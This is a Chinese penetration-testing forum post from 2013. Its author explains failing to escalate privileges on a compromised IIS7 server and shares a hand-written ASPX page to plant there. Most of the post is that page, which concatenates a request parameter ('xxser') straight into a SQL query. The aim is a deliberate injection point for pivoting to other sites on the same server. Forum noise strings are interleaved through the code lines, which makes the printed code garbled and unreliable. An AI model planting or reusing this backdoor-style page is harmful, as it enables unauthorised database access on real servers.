中国网络渗透测试联盟

标题: 利用aspx构造注射来跨站 [打印本页]

---

作者: admin    时间: 2013-3-20 21:32
标题: 利用aspx构造注射来跨站
昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
% h1 d8 e* O, E- N+ \; u代码量不多，自己写个拉倒了。烦死了。
3 l& n% k' h- x4 f# S0 D0 X
  b' R& T/ }8 m) {' h/ y​
) P- x0 u0 g/ z0 y( [<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+ b2 w3 x& ~4 o9 u% T<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
9 R: e( p3 \! U    <div>
+ c$ e  Y* T' l9 j3 `- _& ?     <script language="c#" runat="server">
0 H+ s' c1 o. @# L/ ^3 y- c6 f            
         void page_init(object sender, EventArgs e)
         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
# j, Q4 H' _% p% W3 w7 w! E            
6 |; ]; e& t8 K: ~2 Y( I             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
3 U$ l- ]5 _+ K+ j4 c6 v4 h            
: |4 ?6 j3 x. p; d9 ?2 F6 k             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
             Response.Write(x);
             conn.Close();
$ x4 M" D; j  x: L8 ~  [         }
! i. x) I' ^/ M     
  </script>
$ r! t+ W& F* Z. S% l2 `    </div>
    </form>
</body>
</html>
4 F8 q- \% s# u

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2